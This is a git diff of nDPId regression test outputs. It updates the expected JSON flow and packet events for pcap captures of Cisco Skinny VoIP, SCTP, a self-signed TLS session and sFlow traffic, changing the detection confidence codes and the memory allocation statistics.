00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1557178511664,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"uDhhiHXEAFBW6tqSCABFAAAsAABAAEAGSPoKtG4wCrRuOgfQtX0KPck5YFN\/AmASchDEGQAAAgQFtA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1557178511664,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAoOMUAAP8GkNgKtG46CrRuMLV9B9BgU38CCj3JOlAQECA9xwAA"} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1557178511664,"flow_last_seen":1557178511707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1557178511707,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1557178511664,"flow_last_seen":1557178511908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1557178511908,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1557178511664,"flow_last_seen":1557178511664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1557178511664,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1557178511664,"flow_last_seen":1557178511908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1557178511908,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","packets-captured":17,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":596,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1557178511908} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17/17 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871984 bytes -~~ total memory freed........: 5871984 bytes -~~ total allocations/frees...: 118132/118132 +~~ total memory allocated....: 6003570 bytes +~~ total memory freed........: 6003570 bytes +~~ total allocations/frees...: 120893/120893 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 707 chars 
diff --git a/test/results/sctp.cap.out b/test/results/sctp.cap.out
index da2afd7ef..706b94263 100644
--- a/test/results/sctp.cap.out
+++ b/test/results/sctp.cap.out
@@ -2,14 +2,14 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1088696689784} 00539{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1088696689784,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3} 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1088696689784,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1088696689784,"pkt":"AKCAAF5GCAADSgA1CABFAAB8FBwAADuESlQKHAYrChwGLEAAC4AAAW8KbbAYggADAFsoAkNFAACgvQAAAAdNRUdBQ08vMiA8bWctdHI+OjE2Mzg0ClJlcGx5ID0gMTc0MDkxewpDb250ZXh0ID0gMjU1ewpNb2RpZnkgPSBNVVgvMjU1Cn0KfQpn"} 
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1088696689784,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"ndpi": {"confidence": {"4":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} +00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1088696689784,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"ndpi": {"confidence": {"6":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1088696689784,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1088696689784,"pkt":"CAADSgA1AKCAAF5GCABFAAAwCdlAAP+EUOIKHAYsChwGKwuAQAAhRBUjK\/ICTgMAABAoAkNFAAAgAAAAAAA="} 
00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1088696689872,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1088696689872,"pkt":"AKCAAF5GAAGvDAaWCABFAAA4ykAAAECEj3QKHAYqChwGLAtZC1kAAA5QU8MFXwQAABgAAQAUQORLkgocBiwbZq9+AAAAAA=="} -00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"ndpi": {"confidence": {"4":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} 
+00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"ndpi": {"confidence": {"6":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1088696689872,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1088696689872,"pkt":"AAGvDAaWAKCAAF5GCABFAAA4u4FAAP+EnzIKHAYsChwGKgtZC1kNU+b+jI4HRgUAABgAAQAUQORLkgocBiwbZq9+AAAAAA=="} -00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} 
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} 
00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":204,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1088696689872} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870619 bytes -~~ total memory freed........: 5870619 bytes -~~ total allocations/frees...: 118122/118122 +~~ total memory allocated....: 6004253 bytes +~~ total memory freed........: 6004253 bytes +~~ total allocations/frees...: 120884/120884 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 640 chars diff --git a/test/results/selfsigned.pcap.out b/test/results/selfsigned.pcap.out index 28b2c5b23..d79c4f106 100644 --- a/test/results/selfsigned.pcap.out +++ b/test/results/selfsigned.pcap.out 
@@ -4,9 +4,9 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588921646472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubiYAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4AAAAAAQCAAA="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588921646472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABC7nJlxL1FVDN7m4nsBL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4E3\/M+AQCAAA="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588921646472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubicS9RVRgBAx1\/4oAAABAQgKE3\/M+BN\/zPg="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}} 
-01017{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}} 
+01017{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":2634,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1588921646517} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 
@@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880431 bytes -~~ total memory freed........: 5880431 bytes -~~ total allocations/frees...: 118142/118142 +~~ total memory allocated....: 6014065 bytes +~~ total memory freed........: 6014065 bytes +~~ total allocations/frees...: 120904/120904 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1401 chars diff --git a/test/results/sflow.pcap.out b/test/results/sflow.pcap.out index 04734b12f..9cf4ff4f7 100644 --- a/test/results/sflow.pcap.out +++ b/test/results/sflow.pcap.out 
@@ -3,9 +3,9 @@ 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1378125488790,"flow_last_seen":1378125488790,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1378125488790,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1378125488790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1378125488790,"pkt":"AFBWlgDZAOCxz5TDCABFAACsIfoAAEARuUSsFSMRrBUjxwQDGMcAmAAAAAAABQAAAAGsFSMRAAAAAQAAAZ9nPdcQAAAAAQAAAAIAAABsAAAhJQAABAwAAAABAAAAAQAAAFgAAAQMAAAABgAAAAAF9eEAAAAAAQAAAAMAAAAAAYwszAAAm4MAApAWAAH2cwAAAAAAAAAAAAAAAAAAAAAAUz3BAACgtwAAIYcAAAjXAAAAAAAAAAAAAAAA"} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1378125507793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1378125507793,"pkt":"AFBWlgDZAOCxz5TDCABFAACsIfsAAEARuUOsFSMRrBUjxwQDGMcAmAAAAAAABQAAAAGsFSMRAAAAAQAAAaBnPiFIAAAAAQAAAAIAAABsAAAAaAAABBMAAAABAAAAAQAAAFgAAAQTAAAABgAAAAAF9eEAAAAAAQAAAAMAAAAAAwmHZAAAPY8ACrt0AAAffQAAAAAAAAAAAAAAAAAAAAAGHWdKAABT9wAJE0IACVxYAAAAAAAAAAAAAAAA"} 
